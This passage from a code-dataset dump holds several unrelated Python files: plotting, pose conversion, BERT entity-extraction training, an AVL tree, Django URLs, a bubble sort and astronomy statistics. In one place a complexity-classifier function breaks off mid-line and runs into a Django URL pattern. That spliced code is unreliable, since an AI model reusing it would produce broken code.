[fig,ax]\n\n\ndef dggcomp(both=True, filename=None):\n v = Vibrations()\n #l1 = v.getlsd(fn_v_float_on, minfreq=.02)\n #l2 = v.getlsd(fn_v_float_off, minfreq=.02)\n l1 = v.getlsd(fn_v_lindriveon75hz, minfreq=.02)\n l2 = v.getlsd(fn_v_base, minfreq=.02)\n fig,ax = plt.subplots(figsize=(5,4))\n if both:\n ax.loglog(l1[0],l1[4]*1e6, label='PT on')\n ax.loglog(l2[0],l2[4]*1e6, label='PT off')\n ax.legend()\n else:\n ax.loglog(l1[0],l1[4]*1e6, label='PT on')\n ax.set_ylim([1e-6,10])\n ax.set_xlim([1,100])\n if filename is not None:\n ax.tick_params(labelbottom='off')\n ax.tick_params(labelleft='off')\n fig.savefig(filename, dpi=600, transparent=True)\n return [fig,ax]\n\ndef dggcomp_2():\n v = Vibrations()\n l1 = v.getlsd(fn_v_lindriveon75hz, minfreq=.05)\n l2 = v.getlsd(fn_v_base, minfreq=.05)\n fig,ax = plt.subplots(figsize=(6/1.5,4/1.5))\n ax.loglog(l1[0],l1[4]*1e6, label='PT on', color='C1')\n ax.loglog(l2[0],l2[4]*1e6, label='PT off',color='C2')\n ax.legend()\n ax.set_ylim([1e-6,10])\n ax.set_xlim([1,100])\n ax.set_xlabel('Frequency (Hz)')\n ax.set_ylabel(r'$\\mu{\\rm m}/\\sqrt{\\rm Hz}$')\n return [fig,ax]\n\n\ndef denhanncomp(filename=None, w=6.55, h=3.65):\n v = Vibrations()\n l1 = v.getlsd(fn_v_lindriveon75hz, minfreq=.1)\n fig,ax = plt.subplots()\n ax.set_xlabel('Frequency (Hz)')\n ax.set_ylabel(r'${\\rm m}^2/{\\rm Hz}$')\n ax.loglog(l1[0], np.square(l1[4]))\n ax.set_ylim([2e-22, 1e-11])\n ax.set_xlim([1,100])\n fig.tight_layout()\n setaxsize(ax, w, h)\n if filename is not None:\n ax.tick_params(labelbottom='off')\n ax.tick_params(labelleft='off')\n fig.savefig(filename, dpi=600, transparent=True)\n return [fig,ax]\n\ndef setaxsize(ax, w,h):\n \"\"\" w, h: width, height in inches \"\"\"\n if not ax: ax=plt.gca()\n l = ax.figure.subplotpars.left\n r = ax.figure.subplotpars.right\n t = ax.figure.subplotpars.top\n b = ax.figure.subplotpars.bottom\n figw = float(w)/(r-l)\n figh = float(h)/(t-b)\n ax.figure.set_size_inches(figw, figh)\n \ndef uqtcomp(w=5,h=1.434):\n v = Vibrations()\n l1 = v.getlsd(fn_vcopen_pton[0], minfreq=.2, vparam='v2')\n fig,ax = plt.subplots()\n ax.loglog(l1[0], np.sqrt(l1[1])/.1024/9.8)\n ax.set_xlabel('Hz')\n ax.set_ylabel('g/sqrt(Hz)')\n ax.set_ylim([1e-7,5e-3])\n ax.set_xlim([1,1000])\n setaxsize(ax, w,h)\n return [fig,ax]\n\ndef blueforscomp(filename=None):\n v = Vibrations()\n l = v.getlsd(fn_v_lindriveon75hz, minfreq=.2, scaling='spectrum')\n fig,ax = plt.subplots()\n ax.set_xlabel('Frequency (Hz)')\n ax.set_ylabel(r'${\\rm m}$')\n ax.loglog(l[0], l[4])\n ax.set_xlim([1,200])\n ax.set_ylim([1e-12, 1e-6])\n fig.tight_layout()\n if filename is not None:\n ax.tick_params(labelbottom='off')\n ax.tick_params(labelleft='off')\n fig.savefig(filename, dpi=300, transparent=True)\n return [fig,ax]\n\n\n","sub_path":"2018/02/analyze_geo.py","file_name":"analyze_geo.py","file_ext":"py","file_size_in_byte":6306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"565564398","text":"import os\nimport json\nimport numpy as np\n\ndef rotMat2Quat(poseRotMat):\n res = []\n\n for i, mat3x3 in enumerate(poseRotMat):\n qw = qx = qy = qz = None\n\n tr = mat3x3[0][0] + mat3x3[1][1] + mat3x3[2][2]\n if (tr > 0):\n # print(\"!1!\")\n S = np.sqrt(tr + 1) *2\n qw = 0.25*S\n qx = (mat3x3[2][1] - mat3x3[1][2]) / S\n qy = (mat3x3[0][2] - mat3x3[2][0]) / S\n qz = (mat3x3[1][0] - mat3x3[0][1]) / S\n elif ((mat3x3[0][0] > mat3x3[1][1]) & (mat3x3[0][0] > mat3x3[2][2])):\n # print(\"!2!\")\n S = np.sqrt(1 + mat3x3[0][0] - mat3x3[1][1] - mat3x3[2][2]) * 2\n qw = (mat3x3[2][1] - mat3x3[1][2]) / S\n qx = 0.25*S\n qy = (mat3x3[1][0] + mat3x3[0][1]) / S\n qz = (mat3x3[2][0] + mat3x3[0][2]) / S\n elif ((mat3x3[1][1] > mat3x3[2][2])):\n # print(\"!3!\")\n S = np.sqrt(1 + mat3x3[1][1] - mat3x3[0][0] - mat3x3[2][2]) * 2\n qw = (mat3x3[0][2] - mat3x3[2][0]) / S\n qx = (mat3x3[1][0] + mat3x3[0][1]) / S\n qy = 0.25*S\n qz = (mat3x3[2][1] + mat3x3[1][2]) / S\n else:\n # print(\"!4!\")\n S = np.sqrt(1 + mat3x3[2][2] - mat3x3[0][0] - mat3x3[1][1]) * 2\n qw = (mat3x3[1][0] - mat3x3[0][1]) / S\n qx = (mat3x3[2][0] + mat3x3[0][2]) / S\n qy = (mat3x3[2][1] + mat3x3[1][2]) / S\n qz = 0.25*S\n # negate x and w\n # RHS coordinate system to LHS\n res.append([-qw, -qx, qy, qz])\n return res\n\ndef output_pretty(spin_output_path):\n # prepare spin json for unity\n # 1. rotation matrix to Quaterion\n # 2. pretty json\n spin_output = dict()\n with open(spin_output_path, \"r\") as f:\n spin_output = json.load(f)\n res = {\n \"dataset\": spin_output[\"dataset:\"],\n \"name\": spin_output[\"name\"],\n \"betas\": spin_output[\"pred_betas\"][0],\n \"poses\": None,\n \"camera_trans\": spin_output[\"camera_translation\"],\n }\n\n pose_parms = rotMat2Quat(np.concatenate((spin_output[\"global_orient\"][0], spin_output[\"body_pose\"][0]), axis=0))\n res[\"poses\"] = pose_parms\n print(np.array(pose_parms).shape)\n return res\n\n# img_name = \"000000000785\"\n# path_spin = \"./COCO_2017kpt/{}_output.json\".format(img_name)\n# path_unity = \"./unity_format_data/{}_spin.json\".format(img_name)\n#\n# json_unity = output_pretty(path_spin)\n# with open(path_unity, \"w\") as f:\n# json.dump(json_unity, f, indent=4)\n","sub_path":"json_spin2unity.py","file_name":"json_spin2unity.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"14097108","text":"import json\nfrom tqdm import tqdm\nimport os\nimport pandas as pd\nfrom data_utils import *\nfrom keras.callbacks import Callback\nfrom model import Graph\nfrom keras_bert import Tokenizer, calc_train_steps\nimport tensorflow as tf\nimport re\nimport keras.backend as K\n\nglobal graph\ngraph = tf.get_default_graph()\n\nmax_len = 200\n\ncategory_nums = 21\nseed = 10\n\ntoken_dict = {}\ndict_path = 'chinese_L-12_H-768_A-12/vocab.txt'\nwith open(dict_path, encoding='utf8') as file:\n for line in file.readlines():\n token = line.strip()\n token_dict[token] = len(token_dict)\n\nadditional_chars = set()\n\n\nclass OurTokenizer(Tokenizer):\n def _tokenize(self, text):\n tokens = []\n for c in text:\n if c in self._token_dict:\n tokens.append(c)\n elif self._is_space(c):\n tokens.append('[unused1]')\n else:\n tokens.append('[UNK]')\n return tokens\n\n\ntokenizer = OurTokenizer(token_dict)\n\n\ndef read_data():\n # 读取数据,排除“其他”类型,其他对应的结果是nan\n data = pd.read_csv('data/train.csv', header=None)\n data = data[data[2] != '其他']\n data = data[data[1].str.len() <= 256]\n\n # 统计所有存在的事件类型\n if not os.path.exists('data/classes.json'):\n id2class = dict(enumerate(data[2].unique()))\n class2id = {j: i for i, j in id2class.items()}\n json.dump([id2class, class2id], open('data/classes.json', 'w', encoding='utf-8'), ensure_ascii=False)\n else:\n id2class, class2id = json.load(open('data/classes.json', encoding='utf-8'))\n\n # 移除事件主体不在原句子中的数据\n train_data = []\n for t, c, n in zip(data[1], data[2], data[3]):\n if n in t:\n train_data.append((t, c, n))\n\n # shuffle一下并划分数据集\n random_order = shuffle(train_data, seed=seed)[0].tolist()\n train_data = random_order[0:int(0.98 * len(random_order))]\n dev_data = random_order[int(0.98 * len(random_order)):]\n\n # 新数据\n new_data = pd.read_csv('new_data.csv')\n for t, c, n in new_data.values:\n train_data.append((t, c, n))\n\n train_data = shuffle(train_data, seed=seed)[0].tolist()\n\n for d in train_data + dev_data:\n additional_chars.update(re.findall(u'[^\\u4e00-\\u9fa5a-zA-Z0-9\\*]', d[2]))\n\n additional_chars.remove(u',')\n\n # 把验证集作为测试集\n dev = pd.read_csv('data/eval.csv', encoding='utf-8', header=None)\n test_data = []\n for id, t, c in zip(dev[0], dev[1], dev[2]):\n test_data.append((id, t, c))\n\n return train_data, dev_data, test_data, id2class, class2id\n\n\ndef list_find(list1, list2):\n \"\"\"在list1中寻找子串list2,如果找到,返回第一个下标;\n 如果找不到,返回-1。\n \"\"\"\n n_list2 = len(list2)\n for i in range(len(list1)):\n if list1[i: i + n_list2] == list2:\n return i\n return -1\n\n\ndef seq_padding(X, padding=0):\n max_len = max([len(x) for x in X])\n return np.array([\n np.concatenate([x, [padding] * (max_len - len(x))]) if len(x) < max_len else x for x in X\n ])\n\n\ndef data_generator(data, batch_size):\n while True:\n X, segment, start, end, max_length = [], [], [], [], 0\n for i, d in enumerate(data):\n text, c = d[0][:max_len], d[1]\n # x = f'___{c}___{text}'\n # tokens = tokenizer.tokenize(first=text, second=c)\n # if len(tokens) > max_length:\n # max_length = len(tokens)\n\n sub = d[2]\n # sub_token = tokenizer.tokenize(sub)[1:-1]\n # s = list_find(tokens, sub_token)\n s = text.find(sub)\n if s != -1:\n e = s + len(sub) - 1\n\n x, seg = tokenizer.encode(first=text, second=c)\n if len(x) > max_length:\n max_length = len(x)\n\n X.append(x)\n segment.append(seg)\n start.append(s)\n end.append(e)\n\n if len(X) == batch_size or i == len(data) - 1:\n X = pad_sequences(X, maxlen=max_length)\n segment = pad_sequences(segment, maxlen=max_length)\n start = one_hot(start, max_length)\n end = one_hot(end, max_length)\n yield [X, segment, start, end], None\n X, segment, start, end, max_length = [], [], [], [], 0\n\n\ndef softmax(x):\n x = x - np.max(x)\n x = np.exp(x)\n return x / np.sum(x)\n\n\nnew_data = []\n\n\ndef extract_entity(text, category, class2id, model):\n \"\"\"解码函数,应自行添加更多规则,保证解码出来的是一个公司名\n \"\"\"\n if category not in class2id.keys():\n return 'NaN'\n\n # text_in = u'___%s___%s' % (category, text)\n # text_in = text_in[:510]\n # _tokens = tokenizer.tokenize(text_in)\n # _tokens = tokenizer.tokenize(first=text, second=category)\n text = text[:400]\n x, s = tokenizer.encode(first=text, second=category, max_len=512)\n prob_s, prob_e = model.predict([np.array([x]), np.array([s])])\n prob_s, prob_e = softmax(prob_s[0]), softmax(prob_e[0])\n\n for i, t in enumerate(text):\n if len(t) == 1 and re.findall(u'[^\\u4e00-\\u9fa5a-zA-Z0-9\\*]', t) and t not in additional_chars:\n prob_s[i] -= 10\n start = prob_s.argmax()\n\n for end in range(start, len(text)):\n t = text[end]\n if len(t) == 1 and re.findall(u'[^\\u4e00-\\u9fa5a-zA-Z0-9\\*]', t) and t not in additional_chars:\n break\n end = prob_e[start:end + 1].argmax() + start\n res = ''.join(text[start: end + 1])\n\n if prob_s[start] > 0.9 and prob_e[end] > 0.9:\n new_data.append([text, category, res])\n\n return res\n\n\nclass Evaluate(Callback):\n def __init__(self, data, model, test_model, class2id):\n self.ACC = []\n self.best = 0.\n self.passed = 0\n self.dev_data = data\n self.model = model\n self.test_model = test_model\n self.class2id = class2id\n\n def on_batch_begin(self, batch, logs=None):\n \"\"\"第一个epoch用来warmup,第二个epoch把学习率降到最低\n \"\"\"\n if self.passed < self.params['steps']:\n lr = (self.passed + 1.) / self.params['steps'] * learning_rate\n K.set_value(self.model.optimizer.lr, lr)\n self.passed += 1\n elif self.params['steps'] <= self.passed < self.params['steps'] * 2:\n lr = (2 - (self.passed + 1.) / self.params['steps']) * (learning_rate - min_learning_rate)\n lr += min_learning_rate\n K.set_value(self.model.optimizer.lr, lr)\n self.passed += 1\n\n def on_epoch_end(self, epoch, logs=None):\n acc = self.evaluate()\n self.ACC.append(acc)\n if acc >= self.best:\n self.best = acc\n self.model.save_weights('output/subject_model.weights')\n print('epoch: %d, acc: %.4f, best acc: %.4f\\n' % (epoch, acc, self.best))\n\n # def evaluate(self):\n # eps = 0\n # error_list = []\n # for d in tqdm(iter(self.dev_data)):\n # R = extract_entity(d[0], d[1], self.class2id, self.test_model)\n # if R == d[2]:\n # eps += 1\n # else:\n # error_list.append((d[0], d[1], d[2], R))\n # with open('error.txt', 'w', encoding='utf-8')as file:\n # file.write(str(error_list))\n # return eps / len(self.dev_data)\n\n def evaluate(self):\n eps = 0\n for d in tqdm(iter(self.dev_data)):\n R = extract_entity(d[0], d[1], self.class2id, self.test_model)\n if R == d[2]:\n eps += 1\n pre = eps / len(self.dev_data)\n\n return 2 * pre / (pre + 1)\n\n\ndef dev(dev_data, class2id, test_model):\n eps = 0\n error_list = []\n for d in tqdm(iter(dev_data)):\n R = extract_entity(d[0], d[1], class2id, test_model)\n if R == d[2]:\n eps += 1\n else:\n error_list.append((d[0], d[1], d[2], R))\n with open('error.txt', 'w', encoding='utf-8')as file:\n file.write(str(error_list))\n\n pre = eps / len(dev_data)\n return (2 * pre) / (1 + pre)\n\n\ndef test(test_data, class2id, test_model):\n \"\"\"注意官方页面写着是以\\t分割,实际上却是以逗号分割\n \"\"\"\n with open('result.txt', 'w', encoding='utf-8')as file:\n for d in tqdm(iter(test_data)):\n s = str(d[0]) + ',' + extract_entity(d[1].replace('\\t', ''), d[2], class2id, test_model)\n file.write(s + '\\n')\n\n print('length: ', len(new_data))\n import json\n dic = {'data': new_data}\n with open('new_data.txt', 'w', encoding='utf-8')as file:\n file.write(json.dumps(dic, ensure_ascii=False))\n\n\nif __name__ == '__main__':\n batch_size = 16\n learning_rate = 1e-3\n min_learning_rate = 1e-5\n epochs = 100\n is_test = False\n\n train_data, dev_data, test_data, id2class, class2id = read_data()\n\n total_steps, warmup_steps = calc_train_steps(\n num_example=len(train_data),\n batch_size=batch_size,\n epochs=epochs,\n warmup_proportion=0.1,\n )\n\n model, test_model = Graph(total_steps, warmup_steps, lr=learning_rate, min_lr=min_learning_rate)\n\n if is_test:\n test_model.load_weights('output/subject_model.weights')\n model.load_weights('output/subject_model.weights')\n test(test_data, class2id, test_model)\n # acc = dev(dev_data, class2id, test_model)\n # print('acc: ', acc)\n else:\n # test_model.load_weights('output/subject_model.weights')\n # model.load_weights('output/subject_model.weights')\n\n evaluator = Evaluate(dev_data, model, test_model, class2id)\n X = data_generator(train_data, batch_size)\n steps = int((len(train_data) + batch_size - 1) / batch_size)\n\n model.fit_generator(X, steps_per_epoch=100, epochs=epochs, callbacks=[evaluator])\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"247728391","text":"class Solution:\n def isOneBitCharacter(self, bits) -> bool:\n # 统计紧接着0之前的1的个数,如果为奇数,则末尾必定是2比特,返回False,否则为1比特,返回True\n pre_num = 0\n if len(bits) < 2:\n return True\n if bits[-2] == 0:\n return True\n for i in range(len(bits) - 2, -1, -1):\n if bits[i] == 1:\n pre_num += 1\n else:\n break\n if pre_num % 2 == 1:\n return False\n else:\n return True\n\n\nif __name__ == '__main__':\n x = Solution()\n\n bits = [1, 0, 0]\n\n print(x.isOneBitCharacter(bits))\n","sub_path":"717. 1比特与2比特字符.py","file_name":"717. 1比特与2比特字符.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"205754236","text":"## Implementation of the AVL tree !!\n'''\n- still need to make pre order and post order traversal\n'''\nclass Node(object):\n\n\tdef __init__(self,data):\n\t\tself.data = data\n\t\tself.rightChild = None\n\t\tself.leftChild = None\n\t\tself.height = 0 # helps with checking if tree is balanced\n\t\t# Height of Node: length of longest path from it to leaf\n\nclass AVL(object):\n\n\tdef __init__(self):\n\t\tself.root = None\n\n\tdef calcHeight(self, node):\n\t\tif not node: # if the node is None\n\t\t\treturn -1\n\t\telse:\n\t\t\treturn node.height\n\n\t# if return value > 1, it means left heavy situations -> right rotation\n\t# if return value < -1, it means right heavy situations -> left rotation\n\t# if between -1 and 1, it is balanced\n\n\tdef calcBalance(self, node):\n\t\tif not node:\n\t\t\treturn 0\n\t\telse: \n\t\t\treturn self.calcHeight(node.leftChild) - self.calcHeight(node.rightChild)\n\n\t# Rotations to the right and the left are symmetrical operations\n\t# Rotation operations are quite fast as it it just updating references O(1) time complexity\n\tdef rotateRight(self,node):\n\t\t#print(\"Rotating to the right on node %d\" % node.data)\n\t\ttempLeft = node.leftChild\n\t\tt = tempLeft.rightChild\n\n\t\ttempLeft.rightChild = node\n\t\tnode.leftChild = t\n\n\t\t# update node's height by checking left and right sub tree\n\t\tnode.height = max(self.calcHeight(node.leftChild),self.calcHeight(node.rightChild)) + 1\n\t\ttempLeft.height = max(self.calcHeight(tempLeft.leftChild),self.calcHeight(tempLeft.rightChild)) + 1\n\n\t\t# return the new root node\n\t\treturn tempLeft\n\n\tdef rotateLeft(self,node):\n\t\t#print(\"Rotating to the left on node %d\" % node.data)\n\t\ttempRight = node.rightChild\n\t\tt = tempRight.leftChild\n\n\t\ttempRight.leftChild = node\n\t\tnode.rightChild = t\n\n\t\t# update node's height by checking left and right sub tree\n\t\tnode.height = max(self.calcHeight(node.leftChild),self.calcHeight(node.rightChild)) + 1\n\t\ttempRight.height = max(self.calcHeight(tempRight.leftChild),self.calcHeight(tempRight.rightChild)) + 1\n\n\t\t# return the new root node\n\t\treturn tempRight\n\n\t# Inserting data into AVL tree\n\t# need to check if we violated the AVL property\n\tdef insert(self,data):\n\t\tself.root = self.insertNode(data,self.root)\n\n\tdef insertNode(self,data,node):\n\t\tif not node: # base case so plug in the value\n\t\t\treturn Node(data)\n\t\telse:\n\t\t\tif data < node.data: # call recursively on left subtree to insert\n\t\t\t\tnode.leftChild = self.insertNode(data, node.leftChild)\n\t\t\telse: # call recursively on right subtree\n\t\t\t\tnode.rightChild = self.insertNode(data,node.rightChild)\n\n\t\t\t# update height parameter\n\t\t\tnode.height = max(self.calcHeight(node.leftChild),self.calcHeight(node.rightChild)) + 1\n\n\t\t\t# fixes any errors in the balance of the tree\n\t\t\treturn self.settleViolation(data,node)\n\n\tdef settleViolation(self,data,node):\n\t\tbalance = self.calcBalance(node)\n\t\t# Case 1: Greater than 1 -> left left heavy -> & current data is smaller than left child so -> simple right rotation\n\t\tif balance > 1 and data < node.leftChild.data:\n\t\t\t#print(\"Doubly left heavy situation...\")\n\t\t\treturn self.rotateRight(node)\n\n\t\t# Case 2: Less than -1 -> right right heavy -> & current data is smaller than right child so -> simple left rotation\n\t\telif balance < -1 and data > node.rightChild.data:\n\t\t\t#print(\"Doubly right heavy situation...\")\n\t\t\treturn self.rotateLeft(node)\n\t\t# Case 3: Left right\n\t\telif balance > 1 and data > node.leftChild.data: # current data is greater than left (so its on right)\n\t\t\t#print(\"Left-right heavy situation...\")\n\t\t\tnode.leftChild = self.rotateLeft(node.leftChild)\n\t\t\treturn self.rotateRight(node)\n\t\t# Case 4: Right Left\n\t\telif balance < -1 and data < node.rightChild.data:\n\t\t\t#print(\"Right-left heavy situation...\")\n\t\t\tnode.rightChild = self.rotateRight(node.rightChild)\n\t\t\treturn self.rotateLeft(node)\n\n\t\treturn node\n\n\tdef traverse(self):\n\t\tif self.root:\n\t\t\tself.inOrderTraversal(self.root)\n\t\n\tdef inOrderTraversal(self, node):\n\t\tif node.leftChild:\n\t\t\tself.inOrderTraversal(node.leftChild)\n\n\t\tprint(\"%s\" % node.data)\n\n\t\tif node.rightChild:\n\t\t\tself.inOrderTraversal(node.rightChild)\n\n\t# Removing data:\n\tdef remove(self,data):\n\t\tif self.root: # if the root exists -> there are nodes\n\t\t\tself.root = self.removeData(data,self.root)\n\n\t# Using the predecessor method of removing data\n\tdef removeData(self,data,node):\n\t\tif not node: # this is the base case my guy duuhh\n\t\t\treturn node\n\n\t\tif data < node.data: # if smaller\n\t\t\tnode.leftChild = self.removeData(data,node.leftChild)\n\t\telif data > node.data:\n\t\t\tnode.rightChild = self.removeData(data,node.rightChild)\n\t\telse:\n\t\t\t# 1: if there are no children -> Leaf Node\n\t\t\tif not node.leftChild and not node.rightChild:\n\t\t\t\t#print(\"Removing leaf node...\")\n\t\t\t\tdel node\n\t\t\t\treturn None\n\t\t\telif not node.leftChild: # no left but would have right ^\n\t\t\t\t#print(\"Removing node with right child...\")\n\t\t\t\trightChild = node.rightChild\n\t\t\t\tdel node\n\t\t\t\treturn rightChild\n\t\t\telif not node.rightChild: # no right child\n\t\t\t\t#print(\"Removing node with left child...\")\n\t\t\t\tleftChild = node.leftChild\n\t\t\t\tdel node\n\t\t\t\treturn leftChild\n\t\t\telse:\n\t\t\t\t#print(\"Removing node with two children...\")\n\t\t\t\tpredecessor = self.getPredecessor(node.leftChild)\n\t\t\t\tnode.data = predecessor.data\n\t\t\t\tnode.leftChild = self.removeData(predecessor.data,node.leftChild)\n\n\t\tif not node:\n\t\t\treturn node\n\n\t\tnode.height = max(self.calcHeight(node.leftChild),self.calcHeight(node.rightChild)) + 1\n\t\t\n\t\tbalance = self.calcBalance(node)\n\n\t\t# Case 1: Greater than 1 -> left left heavy -> & current data is smaller than left child so -> simple right rotation\n\t\tif balance > 1 and self.calcBalance(node.leftChild) >= 0:\n\t\t\t#print(\"Doubly left heavy situation...\")\n\t\t\treturn self.rotateRight(node)\n\n\t\t# Case 2: Less than -1 -> right right heavy -> & current data is smaller than right child so -> simple left rotation\n\t\telif balance < -1 and self.calcBalance(node.rightChild) <= 0:\n\t\t\t#print(\"Doubly right heavy situation...\")\n\t\t\treturn self.rotateLeft(node)\n\t\t# Case 3: Left right\n\t\telif balance > 1 and self.calcBalance(node.leftChild) < 0: # current data is greater than left (so its on right)\n\t\t\t#print(\"Left-right heavy situation...\")\n\t\t\tnode.leftChild = self.rotateLeft(node.leftChild)\n\t\t\treturn self.rotateRight(node)\n\t\t# Case 4: Right Left\n\t\telif balance < -1 and self.calcBalance(node.rightChild) > 0:\n\t\t\t#print(\"Right-left heavy situation...\")\n\t\t\tnode.rightChild = self.rotateRight(node.rightChild)\n\t\t\treturn self.rotateLeft(node)\n\n\t\treturn node \t\t\t\t\n\n\tdef getPredecessor(self,node): # get largest value in left subtree\n\t\tif not node.rightChild:\n\t\t\treturn node\n\t\treturn self.getPredecessor(node.rightChild)\n\nif __name__ == \"__main__\":\n\tavl = AVL()\n\tavl.insert(10)\n\tavl.insert(20)\n\tavl.insert(5)\n\tavl.insert(6)\n\tavl.insert(15)\n\n\n\tavl.traverse()\n\tavl.remove(15)\n\tavl.remove(20)\n\tavl.traverse()\n","sub_path":"Pypeline/Pypes/AVLTree.py","file_name":"AVLTree.py","file_ext":"py","file_size_in_byte":6727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"325143527","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport xgboost as xgb\nimport math\nimport os \nimport re\nfrom xgboost import XGBClassifier,XGBRegressor\nfrom sklearn import cross_validation, metrics\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import LabelEncoder,OneHotEncoder\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom sklearn.linear_model import ARDRegression\nfrom xgboost import plot_importance\nfrom sklearn.model_selection import KFold \nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\nimport pickle\nimport seaborn as sns \n\n\nlabel_inverse_mappings = { } \nlabel_inverse_mappings[3] = 'N^2'\nlabel_inverse_mappings[6] = 'sqrtN'\nlabel_inverse_mappings[0] = 'LogN'\nlabel_inverse_mappings[1] = 'N'\nlabel_inverse_mappings[2] = 'N*sqrt(N)'\nlabel_inverse_mappings[4] = 'N^3'\nlabel_inverse_mappings[5] = 'NlogN'\n\nforward_mappings = { }\n\nforward_mappings['N^2']= 3\nforward_mappings['sqrtN']=6\nforward_mappings['LogN']=0\nforward_mappings['N']=1\nforward_mappings['N*sqrt(N)']=2\nforward_mappings['N^3']= 4\nforward_mappings['NlogN']= 5\n\n\n\n\ndef complexity_unitary( n , time_taken, p_time ):\n\n\t\tif(n==0):\n\t\t\treturn \"N\"\t\n\t\t# print(n,time_taken,p_time)\n\t\tcalc_time = [None]*7\n\t\tcalc_time[0] = math.log(n,2.0)*p_time;\n\t\tcalc_time[1] = n*math.sqrt(n)*p_time;\n\t\tcalc_time[2] = n*p_time;\n\t\tcalc_time[3] = n*math.log(n,2.0)*p_time;\n\t\tcalc_time[4] = n*n*p_time;\n\t\tcalc_time[5] = n*n*n*p_time;\n\t\tcalc_time[6] = math.sqrt(n)*p_time;\n\t\t\n\t\tmaxnum = 1e8\n\t\tind = -1 \n\n\t\tfor j in range(0,6):\n\t\t\tif abs(calc_time[j]-time_taken)[0-9]+)/$', views.student, name='student'),\n url(r'^get/studentList/', views.studentList, name='studentList'),\n url(r'^get/lecturer/(?P[0-9]+)/$', views.lecturer, name='lecturer'),\n url(r'^get/lecturerList/', views.lecturerList, name='lecturerList'),\n url(r'^get/group/(?P[0-9]+)/$', views.group, name='group'),\n url(r'^get/groupList/', views.groupList, name='groupList'),\n url(r'^get/project/(?P[0-9]+)/$', views.project, name='project'),\n url(r'^get/projectList/', views.projectList, name='projectList'),\n url(r'^get/listAll/', views.listAll, name='listAll'),\n url(r'^get/matching/', views.matching, name='matching'),\n url(r'^get/clearMatching/', views.clearMatching, name='clearMatching'),\n]\n","sub_path":"websys/pas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"526880557","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 23 14:23:25 2019\n\n@author: lingf\n\"\"\"\n\n#Bubble sort\n\nnumbers =['26','54','93','17','77','31','44','55','20']\n\nn = len(numbers)\n\nfor j in range(0,n-2): #outer loop\n offset = len(numbers)-j #which subset of outer loop you want to run inner loop to not repeat\n for i in range(0, offset-1): #finds all positions in list -1 (otherwise get error list index out of range)\n if numbers[i] > numbers[i+1]: #if number is larger than number in position above\n temp_var = numbers[i] #make temporary variable\n numbers[i] = numbers[i+1] #swap numbers around but don't overwrite\n numbers[i+1] = temp_var\n print(numbers)\n \n ","sub_path":"ling_bubble_sort.py","file_name":"ling_bubble_sort.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"313392292","text":"\"\"\" Utility functions and classes for SRP\n\nContext : SRP\nModule : Statistics.py\nVersion : 1.1.0\nAuthor : Stefano Covino\nDate : 03/08/2011\nE-mail : stefano.covino@brera.inaf.it\nURL: : http://www.merate.mi.astro.it/utenti/covino\n\nUsage : to be imported\n\nRemarks : input data are lists of x and weights\n\nHistory : (29/10/2010) First version.\n : (03/08/2011) Correction to weighting.\n\n\"\"\"\n\n\n\nimport numpy\n\nfrom .WeightedMeanFrame import WeightedMeanFrame\n\n\n\n\ndef CondSum (cumnum,cumden,x,wx,cond,it):\n r1 = (numpy.add(cumnum,numpy.multiply(x,numpy.power(wx,-2))),numpy.add(cumden,numpy.power(wx,-2)),it+1)\n r2 = (cumnum,cumden,it)\n return numpy.where (cond, r1, r2) \n\n\n\ndef CondVar (cumnum,x,wa,cond,it):\n r1 = (numpy.add(cumnum,numpy.power(numpy.subtract(x,wa),2)),it+1)\n r2 = (cumnum,it)\n return numpy.where (cond, r1, r2) \n\n\n\ndef AverSigmaClippFrame (x, wx=None, downsig=None, upsig=None, alla=False):\n nx = []\n nwx = []\n # generate numpy arrays\n for i in range(len(x)):\n nx.append(numpy.array(x[i]))\n if wx != None:\n nwx.append(numpy.array(wx[i]))\n else:\n nwx.append(numpy.ones(nx[0].shape))\n #\n res = WeightedMeanFrame(nx,nwx)\n wa = res[0]\n ws = res[1]\n we = res[2]\n wexp = res[3]\n #\n if (downsig == None and upsig == None) or (len(nx) == 1):\n # no condition, nothing to do\n if alla:\n return wa,wexp,ws,we\n else:\n return wa,wexp\n #\n numx = numpy.zeros(nx[0].shape)\n denw = numpy.zeros(nx[0].shape)\n nit = numpy.zeros(nx[0].shape) \n #\n for i in range(len(nx)):\n if downsig != None and upsig == None:\n # high-pass filter\n condiz = (nx[i] >= numpy.subtract(wa,numpy.multiply(ws,downsig)))\n elif downsig == None and upsig != None:\n # low-pass filter\n condiz = (nx[i] <= numpy.add(wa,numpy.multiply(ws,upsig)))\n else:\n # sigma-clipping\n condiz = (numpy.logical_and((nx[i] >= numpy.subtract(wa,numpy.multiply(ws,downsig))),(nx[i] <= numpy.add(wa,numpy.multiply(ws,upsig)))))\n #\n resi = CondSum (numx,denw,nx[i],nwx[i],condiz,nit)\n #\n numx = resi[0]\n denw = resi[1]\n nit = resi[2]\n #\n # mean\n waclp = numpy.divide(numx,denw)\n # exposure map\n wexpclp = numpy.divide(denw,numpy.max(denw))\n #\n # Go on computing only if explicitly required\n if not alla:\n return waclp,wexpclp\n # var\n numx = numpy.zeros(nx[0].shape)\n nit = numpy.zeros(nx[0].shape) \n 